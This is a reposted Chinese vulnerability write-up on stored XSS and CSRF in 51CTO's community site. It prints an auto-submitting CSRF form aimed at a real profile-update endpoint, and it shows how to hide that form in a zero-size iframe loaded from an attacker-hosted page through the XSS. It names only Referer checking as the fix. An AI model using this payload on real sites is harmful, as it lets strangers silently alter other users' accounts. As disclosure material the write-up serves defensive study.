好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

51CTO存储型XSS&CSRF - 网站安全 - 自学php

XSS:

51CTO圈子主页再次XSS

上次我发的是"自定义模块"标题处 这次是内容处``(居然不自己排查下其他地方)

看图

 

html 代码成功注入

CSRF:

 

在个人信息各处 除了修改邮箱地址和密码 其他均可用CSRF攻击

为了方便演示 我就用了 姓名 来测试

<form action="http://home.51cto.com//index.php?s=/Info/doIndex" method="post" class="form_validator" id="regform">  <input name="true_name" value="CSRF TEST" /> <script type="text/javascript">  document.forms[0].submit(); </script> </form>

二者结合:

在上处提过的自定义模块内容处插入这些代码 就能成功修改用户的个人任何信息

就这样贴上去的话 页面会显示"修改成功!"为了让CSRF攻击更隐蔽

我们可以用到<iframe>标签

把表单保存为html 上传到一个网站上

在自定义模块内容处插入:

<iframe width=0 height=0 src=http://xxx.com/1.html>

这样就能神不知鬼不觉得发起CSRF攻击了!

  成功利用! 修复方案: Referer

查看更多关于51CTO存储型XSS&CSRF - 网站安全 - 自学php的详细内容...

  阅读:41次